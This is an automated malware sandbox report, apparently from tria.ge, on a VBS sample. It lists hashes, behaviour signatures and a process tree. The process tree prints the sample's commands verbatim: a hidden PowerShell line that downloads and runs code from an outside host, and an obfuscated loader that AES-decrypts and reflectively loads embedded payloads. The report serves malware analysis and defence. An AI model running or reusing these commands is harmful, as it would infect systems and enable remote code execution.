Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03/12/2024, 18:10

General

  • Target

    6400_output.vbs

  • Size

    49KB

  • MD5

    50e3a17992c509fd34daf21f3d408733

  • SHA1

    99001c7b061914c9caaf7ef2ba75f25ac3498d82

  • SHA256

    bb11c0b847be578c727bd146e232a82eb65b8c43ad1657b200e12416b5fb3e3b

  • SHA512

    e21c89778aecaa7a532f5d953a87b6ed575a14788556b67b3311ffec188d492bd633773ee81879c1451cf6ed1ad4c189bf41f07fc8dbba72bd07103a53597849

  • SSDEEP

    768:I+1zXj3HDb1sybJRpN9/NVAdEamHuaxBsgV29+DY9lYUP7bFQqrSwli:IIzTzL/vtNV/RHvM5ADeHFn0

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6400_output.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2652
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2964
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$UlQe='CrSJrjeaSJrjteSJrjDSJrjecSJrjrypSJrjtSJrjorSJrj'.Replace('SJrj', ''),'FrduLGoduLGmBduLGasduLGe64duLGSduLGtduLGrduLGinduLGgduLG'.Replace('duLG', ''),'SplWEtyitWEty'.Replace('WEty', ''),'TrPLLOaPLLOnPLLOsfPLLOorPLLOmFPLLOinaPLLOlPLLOBloPLLOckPLLO'.Replace('PLLO', ''),'IqAvznvqAvzokqAvzeqAvz'.Replace('qAvz', ''),'ElCRJaeCRJamCRJaeCRJantCRJaAtCRJa'.Replace('CRJa', ''),'CopoKbTyToKbTooKbT'.Replace('oKbT', ''),'CNvoBhaNvoBnNvoBgNvoBeENvoBxNvoBteNvoBnsiNvoBonNvoB'.Replace('NvoB', ''),'DVBxQecoVBxQmVBxQprVBxQeVBxQssVBxQ'.Replace('VBxQ', ''),'GFWFdetFWFdCuFWFdrFWFdreFWFdntFWFdPFWFdrocFWFdessFWFd'.Replace('FWFd', ''),'MaJpEGinJpEGMoJpEGdJpEGuJpEGleJpEG'.Replace('JpEG', ''),'ReaMYpLdMYpLLiMYpLneMYpLsMYpL'.Replace('MYpL', ''),'LoHeytadHeyt'.Replace('Heyt', ''),'EntGbxPrGbxPyGbxPPGbxPoiGbxPntGbxP'.Replace('GbxP', '');powershell -w hidden;function qnnlg($BQRjz){$vhoqP=[System.Security.Cryptography.Aes]::Create();$vhoqP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vhoqP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vhoqP.Key=[System.Convert]::($UlQe[1])('PqF8xJ4DsUvA734I68CUFeZUlzBwmh524HQ2zwVtwU0=');$vhoqP.IV=[System.Convert]::($UlQe[1])('ZAXbNfl672AbdKJrN/GTPw==');$txLMz=$vhoqP.($UlQe[0])();$WcLWs=$txLMz.($UlQe[3])($BQRjz,0,$BQRjz.Length);$txLMz.Dispose();$vhoqP.Dispose();$WcLWs;}function cedax($BQRjz){$surik=New-Object System.IO.MemoryStream(,$BQRjz);$atgID=New-Object System.IO.MemoryStream;$stzGr=New-Object System.IO.Compression.GZipStream($surik,[IO.Compression.CompressionMode]::($UlQe[8]));$stzGr.($UlQe[6])($atgID);$stzGr.Dispose();$surik.Dispose();$atgID.Dispose();$atgID.ToArray();}$UdUcO=[System.IO.File]::($UlQe[11])([Console]::Title);$lgana=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 5).Substring(2))));$RDaZu=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 6).Substring(2))));[System.Reflection.Assembly]::($UlQe[12])([byte[]]$RDaZu).($UlQe[13]).($UlQe[4])($null,$null);[System.Reflection.Assembly]::($UlQe[12])([byte[]]$lgana).($UlQe[13]).($UlQe[4])($null,$null); "
          4⤵
            PID:2496
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2684

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\n1.bat

      Filesize

      48KB

      MD5

      83fba8b8c150fdd949067fc54f597aa1

      SHA1

      fc6e442dba604453db6988950a09cd539c5f2ec8

      SHA256

      7f5beae0e19c0836c3f6838dacbebab8a8811643156f1af13664ff4725989f25

      SHA512

      11c852bb8d36a9e42beb5d42b3120bcec309ff751e60f750b8d35383b546285fd999450a13c238074228b8170d6efd16f238ec2c583964ee8393df23a201c1dd

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IKSWF4055Z67QHXXRMF5.temp

      Filesize

      7KB

      MD5

      b3ec6a40120b04811740a611f2e68b85

      SHA1

      339cbbea669b49e23bf5c1840314d76980f1ae8d

      SHA256

      dde4e5bd545788140157bfd726a5210f9f58f0733ff63dc0f1ac32684c2bb5e5

      SHA512

      d20d735b39b7afa9cda6667c2ab8470888c0e22162f1d01f050a315fabb4e93dc7d62bb18864c29290454660eb6b01930553339f1e141cfc775dc07aea725b26

    • memory/2652-4-0x000007FEF526E000-0x000007FEF526F000-memory.dmp

      Filesize

      4KB

    • memory/2652-5-0x000000001B790000-0x000000001BA72000-memory.dmp

      Filesize

      2.9MB

    • memory/2652-6-0x0000000001E00000-0x0000000001E08000-memory.dmp

      Filesize

      32KB

    • memory/2652-7-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB

    • memory/2652-8-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB

    • memory/2652-9-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB

    • memory/2652-10-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB

    • memory/2652-11-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB